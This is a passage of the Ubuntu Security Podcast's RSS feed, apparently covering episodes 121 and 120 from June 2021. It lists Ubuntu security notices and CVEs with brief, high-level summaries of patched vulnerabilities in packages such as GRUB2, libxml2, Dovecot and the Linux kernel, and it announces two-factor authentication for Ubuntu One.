processes which you can ptrace</li>
<li><a href="https://lwn.net/Articles/820321/">https://lwn.net/Articles/820321/</a></li>
<li><a href="https://www.phoronix.com/scan.php?page=news_item&amp;px=Core-Scheduling-Linux-Close">https://www.phoronix.com/scan.php?page=news_item&amp;px=Core-Scheduling-Linux-Close</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E122.mp3" length="8220673" type="audio/mpeg" /><itunes:duration>10:23</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 121
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-121/</link>
          <pubDate>Fri, 25 Jun 2021 12:36:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>ba13f4f352cef8bc652dfc659b77db653ad8a281e52fb9974ccf5055f0591021280d82b915d1e5689dd92c30b01347593e94a5d2e15fa3b9a91629cc867f69fc</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 121</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Ubuntu One opens up two-factor authentication for all, plus we cover
  security updates for Nettle, libxml2, GRUB2, the Linux kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Ubuntu One opens up two-factor authentication for all, plus we cover
  security updates for Nettle, libxml2, GRUB2, the Linux kernel and more.
  </itunes:summary>
        <description>  Ubuntu One opens up two-factor authentication for all, plus we cover
  security updates for Nettle, libxml2, GRUB2, the Linux kernel and more.
  </description>
        <googleplay:description>  Ubuntu One opens up two-factor authentication for all, plus we cover
  security updates for Nettle, libxml2, GRUB2, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu One opens up two-factor authentication for all, plus we cover
security updates for Nettle, libxml2, GRUB2, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>73 unique CVEs addressed</p>
<h3 id="usn-4989-2-bluez-vulnerabilities-00-57">[<a href="https://ubuntu.com/security/notices/USN-4989-2">USN-4989-2</a>] BlueZ vulnerabilities [00:57]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27153">CVE-2020-27153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26558">CVE-2020-26558</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-120/">Episode 120</a> - bluetooth spec issue around pairing takeover plus a
possible double-free in gattool that is likely quite hard to exploit due
to time window race between the two free() calls</li>
</ul>
<h3 id="usn-4990-1-nettle-vulnerabilities-01-27">[<a href="https://ubuntu.com/security/notices/USN-4990-1">USN-4990-1</a>] Nettle vulnerabilities [01:27]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16869">CVE-2018-16869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3580">CVE-2021-3580</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Low level crypto library used by lots of packages - chrony, dnsmasq,
lighttpd, qemu, squid, supertuxkart</li>
<li>Last covered just a few weeks ago in <a href="https://ubuntusecuritypodcast.org/episode-112/">Episode 112</a> - is someone taking a
closer look at this library?</li>
<li>Bleichenbacher type side-channel base on a padding oracle attack in
endian conversion of RSA decrypted PKCS#1 v1.5 data - requires to run a
process on the same physical core as the victim - but could then allow
the plaintext to be extracted</li>
<li>RSA algo possible crash which is able to be triggered on decryption of
manipulated ciphertext</li>
<li>Changes required for both of these are too intrusive to backport for the
older releases (e.g. 16.04 ESM) so suggest to upgrade to a newer Ubuntu
release if you are using nettle on these older releases and are concerned
about possible attacks</li>
</ul>
<h3 id="usn-4991-1-libxml2-vulnerabilities-03-08">[<a href="https://ubuntu.com/security/notices/USN-4991-1">USN-4991-1</a>] libxml2 vulnerabilities [03:08]</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3541">CVE-2021-3541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3537">CVE-2021-3537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3518">CVE-2021-3518</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3516">CVE-2021-3516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3517">CVE-2021-3517</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24977">CVE-2020-24977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20388">CVE-2019-20388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8872">CVE-2017-8872</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted XML could possibly trigger crash -&gt; DoS or RCE</li>
</ul>
<h3 id="usn-4992-1-grub-2-vulnerabilities-03-33">[<a href="https://ubuntu.com/security/notices/USN-4992-1">USN-4992-1</a>] GRUB 2 vulnerabilities [03:33]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20233">CVE-2021-20233</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20225">CVE-2021-20225</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27779">CVE-2020-27779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27749">CVE-2020-27749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25632">CVE-2020-25632</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14372">CVE-2020-14372</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-106/">Episode 106</a> - BootHole 2021 updates published to the security pocket</li>
<li>Vulns included the ability to load ACPI tables, UAF in rmmod, buffer
overflow in command-line parser, cutmem command boot locking bypass, heap
buffer overflow in option parser and menu rendering OOB write -&gt; RCE &mdash;&gt;@@
all could lead to a bypass of secure boot protections</li>
<li>Includes one grub - ie. same grub efi binary used across all recent
Ubuntu releases</li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass2021">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass2021</a></li>
</ul>
<h3 id="usn-4993-1-dovecot-vulnerabilities-05-13">[<a href="https://ubuntu.com/security/notices/USN-4993-1">USN-4993-1</a>] Dovecot vulnerabilities [05:13]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33515">CVE-2021-33515</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29157">CVE-2021-29157</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>STARTTLS plaintext command injection vuln via SMTP, plus if a local
attacker could write files to the disk, they could supply their own keys
to validate their own supplied JSON Web Token and hence login as any
other user and then access their emails if using OAUTH2</li>
</ul>
<h3 id="usn-4994-1-usn-4994-2-apache-http-server-vulnerabilities-05-58">[<a href="https://ubuntu.com/security/notices/USN-4994-1">USN-4994-1</a>, <a href="https://ubuntu.com/security/notices/USN-4994-2">USN-4994-2</a>] Apache HTTP Server vulnerabilities [05:58]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30641">CVE-2021-30641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26691">CVE-2021-26691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26690">CVE-2021-26690</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35452">CVE-2020-35452</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13950">CVE-2020-13950</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various DoS issues where under certain configurations an attacker could
issue particular requests and trigger various crashes in Apache</li>
</ul>
<h3 id="usn-4996-1-usn-4996-2-openexr-vulnerabilities-06-16">[<a href="https://ubuntu.com/security/notices/USN-4996-1">USN-4996-1</a>, <a href="https://ubuntu.com/security/notices/USN-4996-2">USN-4996-2</a>] OpenEXR vulnerabilities [06:16]</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3605">CVE-2021-3605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3598">CVE-2021-3598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26260">CVE-2021-26260</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23215">CVE-2021-23215</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20296">CVE-2021-20296</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual mix of issues for a library which is written in memory unsafe
language and handling complex image formats etc</li>
<li>Courtesy of OSS-Fuzz</li>
</ul>
<h3 id="usn-4995-1-thunderbird-vulnerabilities-06-48">[<a href="https://ubuntu.com/security/notices/USN-4995-1">USN-4995-1</a>] Thunderbird vulnerabilities [06:48]</h3>
<ul>
<li>20 CVEs addressed in Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29957">CVE-2021-29957</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29956">CVE-2021-29956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29949">CVE-2021-29949</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29948">CVE-2021-29948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-24002">CVE-2021-24002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23995">CVE-2021-23995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23993">CVE-2021-23993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23992">CVE-2021-23992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23991">CVE-2021-23991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23984">CVE-2021-23984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29967">CVE-2021-29967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29946">CVE-2021-29946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29945">CVE-2021-29945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23999">CVE-2021-23999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23998">CVE-2021-23998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23994">CVE-2021-23994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23987">CVE-2021-23987</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23982">CVE-2021-23982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23981">CVE-2021-23981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23961">CVE-2021-23961</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>78.11.0 - usual mix of untrusted content/web framework issues inherited
from Firefox, plus fixes for OpenPGP key handling, message signature
TOCTTOU-type condition due to writing out signatures to disk that then
could be replaced before being verified, UX issue in display of inline
signed/encrypted messages with additional unprotected parts</li>
</ul>
<h3 id="usn-4997-1-linux-kernel-vulnerabilities-08-22">[<a href="https://ubuntu.com/security/notices/USN-4997-1">USN-4997-1</a>] Linux kernel vulnerabilities [08:22]</h3>
<ul>
<li>17 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3543">CVE-2021-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3506">CVE-2021-3506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32399">CVE-2021-32399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31829">CVE-2021-31829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31440">CVE-2021-31440</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23134">CVE-2021-23134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23133">CVE-2021-23133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26145">CVE-2020-26145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26141">CVE-2020-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26139">CVE-2020-26139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24588">CVE-2020-24588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24587">CVE-2020-24587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24586">CVE-2020-24586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33200">CVE-2021-33200</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.11</li>
<li>Basically the same set of fixes for all kernels, including a couple quite
interesting ones:
<ul>
<li>eBPF verifier bypass provides OOB write primitive, could allow a local
attacker to perform code execution in the kernel -&gt; privesc</li>
<li>Race condition in CAN BCM networking protocol -&gt; various UAFs -&gt; code
execution as well</li>
</ul>
</li>
<li>Plus others -&gt; Wifi FragAttack fixes, other eBPF verifier fixes, SCTP
race condition -&gt; UAF etc</li>
</ul>
<h3 id="usn-4999-1-linux-kernel-vulnerabilities-09-51">[<a href="https://ubuntu.com/security/notices/USN-4999-1">USN-4999-1</a>] Linux kernel vulnerabilities [09:51]</h3>
<ul>
<li>17 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-31829">CVE-2021-31829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31440">CVE-2021-31440</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29155">CVE-2021-29155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23133">CVE-2021-23133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26145">CVE-2020-26145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26141">CVE-2020-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26139">CVE-2020-26139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25673">CVE-2020-25673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25672">CVE-2020-25672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25671">CVE-2020-25671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25670">CVE-2020-25670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24588">CVE-2020-24588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24587">CVE-2020-24587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24586">CVE-2020-24586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33200">CVE-2021-33200</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.8 (groovy, focal hwe)</li>
</ul>
<h3 id="usn-5000-1-linux-kernel-vulnerabilities-10-08">[<a href="https://ubuntu.com/security/notices/USN-5000-1">USN-5000-1</a>] Linux kernel vulnerabilities [10:08]</h3>
<ul>
<li>15 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3506">CVE-2021-3506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32399">CVE-2021-32399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31829">CVE-2021-31829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23134">CVE-2021-23134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23133">CVE-2021-23133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26145">CVE-2020-26145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26141">CVE-2020-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26139">CVE-2020-26139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24588">CVE-2020-24588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24587">CVE-2020-24587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24586">CVE-2020-24586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33200">CVE-2021-33200</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 (focal, bionic hwe)</li>
</ul>
<h3 id="usn-5001-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5001-1">USN-5001-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>15 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3543">CVE-2021-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3506">CVE-2021-3506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32399">CVE-2021-32399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31440">CVE-2021-31440</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23134">CVE-2021-23134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23133">CVE-2021-23133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26145">CVE-2020-26145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26141">CVE-2020-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26139">CVE-2020-26139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24588">CVE-2020-24588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24587">CVE-2020-24587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24586">CVE-2020-24586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.10</li>
</ul>
<h3 id="usn-5002-1-linux-kernel--hwe--vulnerability-10-23">[<a href="https://ubuntu.com/security/notices/USN-5002-1">USN-5002-1</a>] Linux kernel (HWE) vulnerability [10:23]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3</li>
<li>CAN BCM</li>
</ul>
<h3 id="usn-5003-1-linux-kernel-vulnerabilities-10-35">[<a href="https://ubuntu.com/security/notices/USN-5003-1">USN-5003-1</a>] Linux kernel vulnerabilities [10:35]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23133">CVE-2021-23133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3600">CVE-2021-3600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (bionic, xenial esm hwe, trusty esm azure)</li>
<li>CAN BCM and eBPF verifier OOB write</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="2fa-coming-to-ubuntu-one-11-04">2FA coming to Ubuntu One [11:04]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/two-factor-authentication-coming-to-ubuntu-one">https://ubuntu.com/blog/two-factor-authentication-coming-to-ubuntu-one</a></li>
<li>Used for access to discourse.ubuntu.com, Launchpad, ubuntuforums,
publishers on the Snap Store etc</li>
<li>Allows to use a phone / desktop TOTP app as second factor, or Yubikey
TOTP etc</li>
<li>Has actually been supported since 2014 but only available to a beta
testing group plus for all Canonical employees, due to challenges in
account recovery
<ul>
<li>Since Ubuntu One purposefully doesn&rsquo;t store any real identifying
information (name, email, username) we can&rsquo;t easily verify account
holders if they lose the 2FA device</li>
<li>The intent is to be robust even in the event that a users email address
is compromised</li>
</ul>
</li>
<li>Now have a comprehensive code recovery experience including printable
backup codes and mechanisms in place to encourage users to exercise
backup codes so that users can feel confident in using these if they need
to (ie where did I put my backup codes again..?)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E121.mp3" length="12621151" type="audio/mpeg" /><itunes:duration>14:35</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 120
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-120/</link>
          <pubDate>Fri, 18 Jun 2021 16:21:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>1580d8948f4c929e33808605579ef600743e0848526106f8cea1ab175aa5cda7d0d52c52a04e3b48fa489743575c268e6100b9d5732f5df1e95abd20385d9ad3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 120</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In this week's episode we look at how to get media coverage for your shiny
  new vulnerability, plus we cover security updates for ExifTool,
  ImageMagick, BlueZ and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  In this week's episode we look at how to get media coverage for your shiny
  new vulnerability, plus we cover security updates for ExifTool,
  ImageMagick, BlueZ and more.
  </itunes:summary>
        <description>  In this week's episode we look at how to get media coverage for your shiny
  new vulnerability, plus we cover security updates for ExifTool,
  ImageMagick, BlueZ and more.
  </description>
        <googleplay:description>  In this week's episode we look at how to get media coverage for your shiny
  new vulnerability, plus we cover security updates for ExifTool,
  ImageMagick, BlueZ and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In this week&rsquo;s episode we look at how to get media coverage for your shiny
new vulnerability, plus we cover security updates for ExifTool,
ImageMagick, BlueZ and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>49 unique CVEs addressed</p>
<h3 id="usn-4986-2-rpcbind-vulnerability-00-44">[<a href="https://ubuntu.com/security/notices/USN-4986-2">USN-4986-2</a>] rpcbind vulnerability [00:44]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-8779">CVE-2017-8779</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-119/">Episode 119</a> (bionic) - memory leak on crafted requests</li>
</ul>
<h3 id="usn-4986-3-usn-4986-4-rpcbind-regression-01-11">[<a href="https://ubuntu.com/security/notices/USN-4986-3">USN-4986-3</a>, <a href="https://ubuntu.com/security/notices/USN-4986-4">USN-4986-4</a>] rpcbind regression [01:11]</h3>
<ul>
<li>Affecting Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)</li>
<li>Original fix missed follow-up patches to correct problems in the upstream
fix - required multiple other bits to work correctly</li>
</ul>
<h3 id="usn-4971-2-libwebp-vulnerabilities-01-34">[<a href="https://ubuntu.com/security/notices/USN-4971-2">USN-4971-2</a>] libwebp vulnerabilities [01:34]</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36331">CVE-2020-36331</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36330">CVE-2020-36330</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36329">CVE-2020-36329</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36328">CVE-2020-36328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25014">CVE-2018-25014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25013">CVE-2018-25013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25012">CVE-2018-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25011">CVE-2018-25011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25010">CVE-2018-25010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25009">CVE-2018-25009</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-118/">Episode 118</a></li>
</ul>
